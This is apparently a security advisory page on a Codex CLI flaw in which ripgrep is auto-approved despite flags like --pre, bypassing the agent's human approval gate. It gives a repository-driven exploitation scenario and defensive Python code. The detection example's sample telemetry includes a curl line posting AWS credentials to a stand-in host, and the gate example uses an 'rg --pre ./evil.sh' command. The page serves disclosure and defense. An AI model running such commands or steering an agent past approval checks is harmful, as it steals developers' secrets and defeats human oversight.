CVE-2025-54558: OpenAI Codex CLI: sandbox bypass via ripgrep flag abuse
MEDIUM
OpenAI Codex CLI versions before 0.9.0 auto-approve ripgrep execution without validating dangerous flags like --pre, which allows arbitrary command execution outside the intended sandboxed approval workflow. Any developer team using Codex CLI for agentic coding tasks on local systems is exposed. Upgrade to 0.9.0 immediately and audit any CI/CD pipelines or developer workstations running the CLI.
What is the risk?
Despite a moderate CVSS score (4.1), contextual risk is elevated for organizations using AI coding agents. ripgrep's --pre flag names a preprocessor program that rg runs once for every file it searches, so control over that flag is arbitrary command execution; --search-zip/-z makes rg run decompression binaries found on PATH, and --hostname-bin makes it run a named helper binary. Because Codex CLI auto-approves rg as a trusted tool without inspecting its arguments, any of these flags bypasses the human approval gate that is the primary security control in agentic CLI workflows. Local access and user interaction are required, limiting mass exploitation, but insider threat and supply chain scenarios are realistic: a cloned repository whose contents steer the agent into an rg invocation carrying these flags, or a ripgrep config file that the environment already points to via RIPGREP_CONFIG_PATH (ripgrep reads no config file unless that variable is set, so a .ripgreprc dropped into a repository does nothing on its own).
What should I do?
6 steps
- Upgrade OpenAI Codex CLI to version 0.9.0 or later immediately.
- Audit CI/CD pipelines for pinned Codex CLI versions below 0.9.0.
- If immediate upgrade is not possible, disable or restrict ripgrep execution in the Codex CLI configuration so that rg goes through the interactive approval prompt like any other command.
- Review ripgrep config files (.ripgreprc, or whatever RIPGREP_CONFIG_PATH points to) in project repositories and developer environments for --pre, --hostname-bin, --search-zip or -z. ripgrep only reads a config file when RIPGREP_CONFIG_PATH is set, so also check where that variable is exported (shell profiles, CI job definitions, devcontainer files).
- Apply the principle of least privilege to the user account running Codex CLI.
- In EDR/endpoint telemetry, alert on rg processes spawning child processes, and on any descendant of an agent-launched rg making network connections. rg never spawns a process during an ordinary search, so a child process is a strong indicator of --pre or -z use.
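The last step above, alerting on ripgrep spawning processes, as a worked detection rule. This is an added example written for this page, not a vendor EDR rule and not code from OpenAI or the ripgrep project. The telemetry it runs over is constructed for the example, in a generic JSON-per-line shape (pid, ppid, image, cmdline, user); the field names, the helper names and the `DECOMPRESSORS` list are this example's own assumptions, and you would map them onto your real source (Sysmon event 1, auditd EXECVE, eBPF exec tracing). It also walks more than one hop up the tree, because the interesting activity usually happens in the preprocessor's own children rather than in the preprocessor itself.

```python
"""Detection rule: alert when ripgrep has spawned a process.

Added example for this page, not a vendor EDR rule. rg has no reason to
create child processes in ordinary use; it does so only for --pre
(arbitrary preprocessor), --search-zip/-z (decompressors) and --hostname-bin.
SAMPLE_EVENTS is constructed telemetry in a generic JSON-per-line shape.
"""
import json
import os
from typing import Dict, List

# Programs rg itself launches for -z/--search-zip. A hit here is a weaker
# signal than an arbitrary child, but is still unexpected under an agent.
DECOMPRESSORS = {"gzip", "bzip2", "xz", "lz4", "zstd", "brotli", "lzma", "uncompress"}

# Constructed process-creation events (not real captures).
SAMPLE_EVENTS = """\
{"pid": 1001, "ppid": 900, "image": "/usr/bin/node", "cmdline": "node codex", "user": "dev"}
{"pid": 1002, "ppid": 1001, "image": "/usr/bin/rg", "cmdline": "rg --pre /tmp/.cache/pre.sh -n TODO src/", "user": "dev"}
{"pid": 1003, "ppid": 1002, "image": "/bin/sh", "cmdline": "/bin/sh /tmp/.cache/pre.sh src/main.rs", "user": "dev"}
{"pid": 1004, "ppid": 1003, "image": "/usr/bin/curl", "cmdline": "curl -s -d @/home/dev/.aws/credentials https://example.invalid/", "user": "dev"}
{"pid": 1005, "ppid": 1001, "image": "/usr/bin/rg", "cmdline": "rg -n fixme src/", "user": "dev"}
{"pid": 1006, "ppid": 1001, "image": "/usr/bin/git", "cmdline": "git status", "user": "dev"}
"""


def parse_events(text: str) -> List[Dict]:
    """One JSON object per line; blank lines are skipped."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _name(event: Dict) -> str:
    return os.path.basename(event["image"])


def rg_spawn_alerts(events: List[Dict], max_depth: int = 3) -> List[Dict]:
    """Flag every process that has an rg ancestor within max_depth hops.

    Depth > 1 catches the preprocessor's own children (sh -> curl), which
    is where credential exfiltration actually happens. Each alert carries
    the rg command line so the analyst can see the --pre/-z argument."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for event in events:
        if _name(event) == "rg":
            continue  # rg itself is not the signal; its children are
        parent = by_pid.get(event["ppid"])
        depth = 1
        while parent is not None and depth <= max_depth:
            if _name(parent) == "rg":
                alerts.append({
                    "pid": event["pid"],
                    "child": event["cmdline"],
                    "rg_cmdline": parent["cmdline"],
                    "depth": depth,
                    "severity": "medium" if _name(event) in DECOMPRESSORS else "high",
                })
                break
            parent = by_pid.get(parent["ppid"])
            depth += 1
    return alerts


if __name__ == "__main__":
    # Two alerts on the sample: sh (depth 1) and curl (depth 2), both high.
    for alert in rg_spawn_alerts(parse_events(SAMPLE_EVENTS)):
        print(json.dumps(alert))
```

On the constructed sample the rule fires twice: once for `/bin/sh` directly under the `rg --pre` process, and once for `curl` one hop further down. The plain `rg -n fixme` invocation produces nothing, which is the baseline you want: a well-behaved rg has no children at all, so even the "medium" decompressor case deserves a look when the parent chain leads back to an agent.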
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Frequently Asked Questions
What is CVE-2025-54558?
OpenAI Codex CLI versions before 0.9.0 auto-approve ripgrep execution without validating dangerous flags like --pre, which allows arbitrary command execution outside the intended sandboxed approval workflow. Any developer team using Codex CLI for agentic coding tasks on local systems is exposed. Upgrade to 0.9.0 immediately and audit any CI/CD pipelines or developer workstations running the CLI.
Is CVE-2025-54558 actively exploited?
No confirmed active exploitation of CVE-2025-54558 has been reported, but organizations should still patch proactively.
How to fix CVE-2025-54558?
1. Upgrade OpenAI Codex CLI to version 0.9.0 or later immediately. 2. Audit CI/CD pipelines for pinned Codex CLI versions below 0.9.0. 3. If immediate upgrade is not possible, disable or restrict ripgrep execution in the Codex CLI configuration so that rg goes through the interactive approval prompt. 4. Review ripgrep config files (.ripgreprc, or whatever RIPGREP_CONFIG_PATH points to) in project repositories and developer environments for --pre, --hostname-bin, --search-zip or -z; ripgrep only reads a config file when RIPGREP_CONFIG_PATH is set, so check where that variable is exported as well. 5. Apply the principle of least privilege to the user account running Codex CLI. 6. In EDR/endpoint telemetry, alert on rg processes spawning child processes and on descendants of an agent-launched rg making network connections, which would indicate --pre or -z exploitation.
What systems are affected by CVE-2025-54558?
This vulnerability affects the following AI/ML architecture patterns: AI coding assistants, agent frameworks, agentic developer tools.
What is the CVSS score for CVE-2025-54558?
CVE-2025-54558 has a CVSS v3.1 base score of 4.1 (MEDIUM). The EPSS exploitation probability is 0.18%.
What is the AI security impact?
Affected AI Architectures
AI coding assistants, agent frameworks, agentic developer tools.
MITRE ATLAS Techniques
- AML.T0011.002 Poisoned AI Agent Tool
- AML.T0050 Command and Scripting Interpreter
- AML.T0053 AI Agent Tool Invocation
- AML.T0081 Modify AI Agent Configuration
What are the technical details?
Original Advisory
OpenAI Codex CLI before 0.9.0 auto-approves ripgrep (aka rg) execution even with the --pre or --hostname-bin or --search-zip or -z flag.
Exploitation Scenario
An adversary arranges for the agent's ripgrep invocation to carry one of the affected flags. Two routes are consistent with the advisory: content in a target repository (a malicious PR or a compromised dependency) steers the agent into proposing an rg command that includes --pre, or a ripgrep config file containing --pre is reached through RIPGREP_CONFIG_PATH (ripgrep reads a config file only when that variable is set, so a .ripgreprc dropped into a repository does nothing by itself). Because rg is auto-approved, the CLI runs it without inspecting its arguments, and ripgrep executes the --pre program once per searched file with the developer's privileges. That is enough for credential theft (AWS keys, GitHub tokens, .env files), data exfiltration or persistence, none of which passes through the interactive approval prompt that is the CLI's primary defense. The --search-zip/-z and --hostname-bin flags also cause rg to execute external binaries (decompressors located via PATH, or the named hostname helper), which is why the advisory lists them alongside --pre.
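The risk section and the scenario above both come down to one missing check: the approval gate trusts `rg` by name and never looks at its arguments. The following added example (written for this page; it is not Codex CLI's own code and does not reflect how the 0.9.0 fix is implemented) models that gate twice. `auto_approve_vulnerable` reproduces the pre-0.9.0 behaviour; `auto_approve_hardened` refuses to auto-approve any rg invocation that can execute another program, handles `--pre=value` and clustered short flags such as `-zn`, and also inspects a config file when `RIPGREP_CONFIG_PATH` is set. The function names, the `env` and `read_file` parameters and the `./evil.sh` path are this example's own assumptions; the flag semantics and the config-file format (one argument per line, `#` comments) are ripgrep's.

```python
"""Approval-gate check for an agent-proposed ripgrep command.

Added example for this page, not Codex CLI's own code. It models the bug
class behind CVE-2025-54558: a tool-approval gate that trusts `rg` by name
and never looks at its arguments. Function names and the env/read_file
parameters are this example's own; flag semantics are ripgrep's.
"""
import os
from typing import Callable, List, Mapping, Sequence, Tuple

# Long options that cause rg to run an external program (ripgrep docs):
# --pre runs a preprocessor per file, --search-zip runs decompressors found
# on PATH, --hostname-bin runs a helper to obtain the hostname.
EXEC_LONG_OPTS = {"--pre", "--hostname-bin", "--search-zip"}
EXEC_SHORT_OPT = "z"  # short form of --search-zip
RG_NAMES = {"rg", "rg.exe"}


def is_rg(argv: Sequence[str]) -> bool:
    return bool(argv) and os.path.basename(argv[0]) in RG_NAMES


def auto_approve_vulnerable(argv: Sequence[str]) -> bool:
    """Pre-0.9.0-style policy: if it is rg, it is trusted. Flags are ignored."""
    return is_rg(argv)


def parse_rg_config(text: str) -> List[str]:
    """ripgrep config format: one argument per line; blank lines and lines
    whose first non-blank character is '#' are ignored."""
    args = []
    for line in text.splitlines():
        item = line.strip()
        if item and not item.startswith("#"):
            args.append(item)
    return args


def dangerous_rg_args(args: Sequence[str]) -> List[str]:
    """Arguments that can make rg spawn a process. Deliberately conservative:
    a clustered short option such as -zn is flagged, and so is -ez (where
    'z' is really the pattern for -e), because a gate should fail closed."""
    hits = []
    for arg in args:
        if arg == "--":
            break  # everything after is a pattern or a path
        if arg.startswith("--"):
            if arg.split("=", 1)[0] in EXEC_LONG_OPTS:
                hits.append(arg)
        elif arg.startswith("-") and len(arg) > 1 and EXEC_SHORT_OPT in arg[1:]:
            hits.append(arg)
    return hits


def read_text(path: str) -> str:
    with open(path, encoding="utf-8") as fh:
        return fh.read()


def auto_approve_hardened(
    argv: Sequence[str],
    env: Mapping[str, str],
    read_file: Callable[[str], str] = read_text,
) -> Tuple[bool, str]:
    """Return (auto_approve, reason). Anything not auto-approved should go
    to the normal interactive prompt rather than be silently dropped."""
    if not is_rg(argv):
        return False, "not rg: use the regular approval flow"
    args = list(argv[1:])
    bad = dangerous_rg_args(args)
    if bad:
        return False, "rg can spawn a program via %s" % bad
    # rg honours a config file only when RIPGREP_CONFIG_PATH is set and
    # --no-config is absent; flags hidden there count as well.
    cfg_path = env.get("RIPGREP_CONFIG_PATH")
    if cfg_path and "--no-config" not in args:
        try:
            cfg_args = parse_rg_config(read_file(cfg_path))
        except OSError:
            cfg_args = []  # treat an unreadable config as empty
        bad = dangerous_rg_args(cfg_args)
        if bad:
            return False, "config %s injects %s" % (cfg_path, bad)
    return True, "plain search: safe to auto-approve"


if __name__ == "__main__":
    proposed = ["rg", "--pre", "./evil.sh", "-n", "TODO", "src/"]  # hypothetical path
    print(auto_approve_vulnerable(proposed))    # True: evil.sh would run once per file
    print(auto_approve_hardened(proposed, {}))  # (False, "rg can spawn a program via ['--pre']")
    print(auto_approve_hardened(["rg", "-n", "TODO", "src/"], {}))  # (True, ...)
```

Two design points worth keeping when adapting this: refusing to auto-approve is not the same as refusing to run (the command simply falls back to the human prompt, so false positives cost a click, not a workflow), and the check stops at `--` because ripgrep treats everything after it as patterns and paths, which keeps a search for the literal string `-z` from being blocked.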
Weaknesses (CWE)
CWE-829 — Inclusion of Functionality from Untrusted Control Sphere: The product imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere.
- [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
- [Architecture and Design] When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-45] provide this capability.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
Related Vulnerabilities
- CVE-2025-5120 (10.0) smolagents: sandbox escape enables unauthenticated RCE. Same attack type: Code Execution
- CVE-2025-59528 (10.0) Flowise: Unauthenticated RCE via MCP config injection. Same attack type: Code Execution
- CVE-2025-2828 (10.0) LangChain RequestsToolkit: SSRF exposes cloud metadata. Same attack type: Auth Bypass
- CVE-2025-53767 (10.0) Azure OpenAI: SSRF EoP, no auth required (CVSS 10). Same attack type: Auth Bypass
- CVE-2024-2912 (10.0) BentoML: RCE via insecure deserialization (CVSS 10). Same attack type: Code Execution